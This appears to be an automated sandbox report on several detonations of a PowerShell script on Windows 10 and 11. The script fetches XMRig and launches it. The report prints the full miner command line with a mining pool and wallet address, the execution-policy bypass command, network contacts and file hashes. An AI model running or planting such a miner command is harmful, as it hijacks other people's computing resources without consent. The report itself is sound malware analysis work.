memory/4776-132-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-133-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-134-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-135-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-136-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-137-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-138-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-139-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-140-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-141-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-142-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-143-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-144-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-145-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-146-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-147-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-148-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-149-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-150-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-151-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-152-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-153-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-154-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-155-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-156-0x00007FF787C00000-0x00007FF788833000-memory.dmp

memory/4776-157-0x00007FF787C00000-0x00007FF788833000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:47

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp

Files

memory/4792-0-0x00007FF86A0E3000-0x00007FF86A0E5000-memory.dmp

memory/4792-1-0x0000013241920000-0x0000013241942000-memory.dmp

memory/4792-10-0x00007FF86A0E0000-0x00007FF86ABA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xxlm1qs2.j1g.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4792-12-0x00007FF86A0E0000-0x00007FF86ABA1000-memory.dmp

memory/4792-14-0x00007FF86A0E0000-0x00007FF86ABA1000-memory.dmp

memory/4792-15-0x0000013241E10000-0x0000013241E22000-memory.dmp

memory/4792-16-0x0000013241E00000-0x0000013241E0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3048-47-0x00000226F3C90000-0x00000226F3CB0000-memory.dmp

memory/3048-48-0x00000226F5690000-0x00000226F56B0000-memory.dmp

memory/3048-49-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/4792-50-0x00007FF86A0E0000-0x00007FF86ABA1000-memory.dmp

memory/3048-52-0x00000226F56D0000-0x00000226F56F0000-memory.dmp

memory/3048-51-0x00000226F56B0000-0x00000226F56D0000-memory.dmp

memory/4792-54-0x00007FF86A0E3000-0x00007FF86A0E5000-memory.dmp

memory/3048-53-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-55-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/4792-56-0x00007FF86A0E0000-0x00007FF86ABA1000-memory.dmp

memory/3048-57-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-59-0x00000226F56D0000-0x00000226F56F0000-memory.dmp

memory/3048-58-0x00000226F56B0000-0x00000226F56D0000-memory.dmp

memory/3048-60-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-61-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-62-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-63-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-64-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-65-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-66-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-67-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-68-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-69-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-70-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-71-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-72-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-73-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-74-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-75-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-76-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-77-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-78-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-79-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-80-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-81-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-82-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-83-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-84-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-85-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-86-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-87-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-88-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-89-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-90-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-91-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-92-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-93-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-94-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-95-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-96-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-97-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-98-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-99-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-100-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-101-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-102-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-103-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-104-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-105-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-106-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-107-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-108-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-109-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-110-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-111-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-112-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-113-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-114-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-115-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-116-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-117-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

memory/3048-118-0x00007FF789DF0000-0x00007FF78AA23000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:50

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3428-3-0x00007FFCAC3F3000-0x00007FFCAC3F4000-memory.dmp

memory/3428-5-0x00000242F9DB0000-0x00000242F9DD2000-memory.dmp

memory/3428-9-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

memory/3428-8-0x00000242F9F60000-0x00000242F9FD6000-memory.dmp

memory/3428-15-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zqd2i35f.cnt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3428-25-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

memory/3428-48-0x00000242F9F40000-0x00000242F9F52000-memory.dmp

memory/3428-61-0x00000242F9F20000-0x00000242F9F2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3104-90-0x0000023611580000-0x00000236115A0000-memory.dmp

memory/3104-91-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3428-93-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

memory/3104-92-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3428-94-0x00007FFCAC3F3000-0x00007FFCAC3F4000-memory.dmp

memory/3428-95-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

memory/3428-96-0x00007FFCAC3F0000-0x00007FFCACDDC000-memory.dmp

memory/3104-97-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-98-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-99-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-100-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-101-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-102-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-103-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-104-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-105-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-106-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-107-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-108-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-109-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-110-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-111-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-112-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-113-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-114-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-115-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-116-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-117-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-118-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-119-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-120-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-121-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-122-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-123-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-124-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-125-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-126-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-127-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-128-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-129-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-130-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-131-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-132-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-133-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-134-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-135-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-136-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-137-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-138-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-139-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-140-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-141-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-142-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-143-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-144-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-145-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-146-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-147-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-148-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-149-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-150-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-151-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-152-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-153-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-154-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-155-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-156-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

memory/3104-157-0x00007FF6550B0000-0x00007FF655CE3000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:51

Platform

win11-20240508-en

Max time kernel

1797s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.14:443 tcp

Files

memory/988-0-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyzruhjg.anu.ps1

